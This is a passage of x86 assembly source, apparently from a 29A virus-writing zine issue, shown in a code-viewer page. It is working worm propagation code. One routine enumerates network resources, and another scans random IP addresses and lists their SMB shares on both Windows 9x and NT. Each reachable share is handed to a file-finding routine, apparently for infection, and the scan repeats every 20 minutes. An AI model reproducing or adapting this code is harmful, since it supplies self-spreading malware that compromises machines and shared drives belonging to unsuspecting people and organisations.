📄 29a-7.003
字号:
mov eax, esp
push eax
push esp
push eax
push ebx
call dword ptr [ebp + netcrcstk.nWNetEnumResourceW - size netcrcstk]
pop edi
sub al, ERROR_MORE_DATA
jne wnet_close
push edi
push eax ;GMEM_FIXED
call cGlobalAlloc
xchg ecx, eax
jecxz wnet_close
push edi
mov eax, esp
push 1
mov edx, esp
push eax
push ecx
push edx
push ebx
mov edi, ecx
call dword ptr [ebp + netcrcstk.nWNetEnumResourceW - size netcrcstk]
pop ecx
pop ecx
test eax, eax
jne wnet_free
test byte ptr [edi + NETRESOURCE.dwUsage], RESOURCEUSAGE_CONTAINER
jne wnet_open
push dword ptr [edi + NETRESOURCE.lpRemoteName]
call dword ptr [ebp + krncrcstk.kSetCurrentDirectoryW]
xchg ecx, eax
jecxz wnet_skipdir
;I'm alone here
;with emptiness eagles and snow.
;Unfriendliness chilling my body
;and taunting with pictures of home.
;(Deep Purple)
call find_files
wnet_skipdir label near
xor eax, eax
wnet_free label near
push eax
push edi
call cGlobalFree
pop ecx
jecxz wnet_next
wnet_close label near
push ebx
store_netapi label near
mov eax, '!bgr'
call eax ;WNetCloseEnum
mov ecx, dword ptr [esi + wnetlist.wnetprev]
jecxz wnet_exit
mov ebx, dword ptr [esi + wnetlist.wnethand]
push esi
mov esi, ecx
call cGlobalFree
jmp wnet_next
wnet_exit label near
push 20 * 60 * 1000 ;20 minutes
call cSleep
jmp find_wnet
find_wnet endp
create_thr2 label near
push esi
push esi
call cCreateThread
;-----------------------------------------------------------------------------
;thread 3: find files on random IP address shares using non-recursive algorithm
;(alter class A: 25%, class b: 25%, class c: 25%, class d: scan all)
;-----------------------------------------------------------------------------
call cGetVersion
test eax, eax
mov eax, 'aten'
mov ecx, '23ip' ;"netapi32" (NT/2000/XP)
jns ip_loaddll
mov eax, 'arvs'
movzx ecx, cx ;"svrapi" (9x/Me)
ip_loaddll label near
pushfd
push 0
push ecx
push eax
push esp
call cLoadLibraryA
add esp, 0ch
popfd
jns ip_getprocnt
call init_findmz
;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------
ip9xcrcbegin label near ;place < 80h bytes from call for smaller code
dd (ip9xcrc_count + 1) dup (0)
ip9xcrcend label near
dd offset ip_share - offset ip9xcrcend + 4
ip_getprocnt label near
call init_findmz
;-----------------------------------------------------------------------------
;API CRC table, null terminated
;-----------------------------------------------------------------------------
ipntcrcbegin label near ;place < 80h bytes from call for smaller code
dd (ipntcrc_count + 1) dup (0)
ipntcrcend label near
dd offset ip_share - offset ipntcrcend + 4
ip_share label near
call random
xchg ebx, eax ;initial IP address
find_ip proc near
call random
and al, 18h
je find_ip ;select class A-C only
xchg ecx, eax
xor eax, eax
mov al, 0ffh
shl eax, cl ;select random class
and ecx, eax ;isolate new class
not eax
and ebx, eax ;remove old class
or ebx, ecx ;insert new class
ip_save label near
push ebx
bswap ebx
enter 34h, 0 ;size of Unicode '\\' + Unicode IP address + '\' + ANSI sharename
lea edi, dword ptr [ebp - 0eh] ;size of '\' + ANSI sharename
call cGetVersion
shr eax, 1fh ;0 if Unicode, 1 if ANSI
xchg esi, eax
xor al, al
mov cl, 0ah
std
stos byte ptr [edi]
mov edx, edi
stos byte ptr [edi] ;store Unicode sentinel
stos byte ptr [edi] ;store Unicode half-character
add edi, esi ;remove character if ANSI
;-----------------------------------------------------------------------------
;convert IP address to string (ANSI or Unicode)
;-----------------------------------------------------------------------------
ip_shift label near
xor eax, eax
shld eax, ebx, 8
ip_hex2dec label near
div cl
xchg ah, al
add al, '0'
stos byte ptr [edi]
xor al, al
stos byte ptr [edi] ;store Unicode half-character
add edi, esi ;remove character if ANSI
shr eax, 8
jne ip_hex2dec
mov al, '.'
stos byte ptr [edi]
xor al, al
stos byte ptr [edi] ;store Unicode half-character
add edi, esi ;remove character if ANSI
shl ebx, 8
jne ip_shift
cld
push edi
mov al, '\'
stos byte ptr [edi]
inc edi ;include Unicode half-character
sub edi, esi ;remove character if ANSI
stos byte ptr [edi] ;store '\\' in ANSI or Unicode
pop edi
test esi, esi
je ip_sharent
;-----------------------------------------------------------------------------
;enumerate shares on IP address (9x/Me platform)
;-----------------------------------------------------------------------------
push ebx
mov eax, esp
push ebx
push esp
push eax
push ebx ;too small size returns needed size
push ebx
push 1
push edi
mov ebx, edi
mov edi, edx
call dword ptr [esp + 44h + ip9xcrcstk.ip9xNetShareEnum + 18h]
pop ecx
pop esi
sub al, ERROR_MORE_DATA
jne ip_restore
imul esi, ecx, size share_info_19x + 50
;include size of optional remark
push esi
push eax ;GMEM_FIXED
call cGlobalAlloc
cdq
xchg ecx, eax
jecxz ip_restore
push ecx ;GlobalFree
push edx
mov eax, esp
push edx
push esp
push eax
push esi
push ecx
push 1
push ebx
mov esi, ecx
call dword ptr [esp + 48h + ip9xcrcstk.ip9xNetShareEnum + 18h]
pop ecx
pop ecx
mov al, '\'
stos byte ptr [edi]
ip_next9x label near
push ecx
push edi
movs dword ptr [edi], dword ptr [esi]
movs dword ptr [edi], dword ptr [esi]
movs dword ptr [edi], dword ptr [esi]
movs byte ptr [edi], byte ptr [esi] ;attach sharename
pop edi
push ebx
call cSetCurrentDirectoryA
xchg ecx, eax
jecxz ip_skip9x
;I dream of rain, I live my years under an open sky
call find_files
ip_skip9x label near
add esi, size share_info_19x - share_info_19x.shi1_pad1
pop ecx
loop ip_next9x
ip_free9x label near
call cGlobalFree
ip_restore label near
leave
pop ebx
inc bl
jne ip_save
push 20 * 60 * 1000 ;20 minutes
call cSleep
jmp find_ip
ip_sharent label near
;-----------------------------------------------------------------------------
;enumerate shares on IP address (NT/2000/XP platform)
;-----------------------------------------------------------------------------
push eax
mov eax, esp
push eax
mov ecx, esp
push ebx
push esp
push eax
push MAX_PREFERRED_LENGTH
push ecx
push 1
push edi
call dword ptr [esp + 44h + ipntcrcstk.ipntNetShareEnum + 1ch]
test eax, eax
pop esi
pop ebx
push esi ;NetApiBufferFree
jne ip_freent
ip_nextnt label near
push esi
lods dword ptr [esi]
push eax
xchg esi, eax
xor eax, eax ;lstrlenW
call store_krnapi
lea eax, dword ptr [eax + eax + 26h]
;include size of Unicode '\\' + Unicode IP address + Unicode '\'
push eax
push GMEM_FIXED
call cGlobalAlloc
xchg ecx, eax
jecxz ip_freent
push ecx ;GlobalFree
push ecx ;SetCurrentDirectoryW
push esi ;lstrcatW
push ecx ;lstrcatW
push '\'
push esp ;lstrcatW
push ecx ;lstrcatW
push edi
push ecx
push (krncrcstk.klstrcpyW - krncrcstk.klstrlenW) shr 2
pop eax
call store_krnapi ;copy IP address
call clstrcatW ;attach '\'
pop eax
call clstrcatW ;attach sharename
push (krncrcstk.kSetCurrentDirectoryW - krncrcstk.klstrlenW) shr 2
pop eax
call store_krnapi
xchg esi, eax
call cGlobalFree
test esi, esi
je ip_skipnt
;when you look into the abyss, the abyss looks back at you
call find_files
ip_skipnt label near
pop esi
add esi, size share_info_1nt
dec ebx
jne ip_nextnt
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -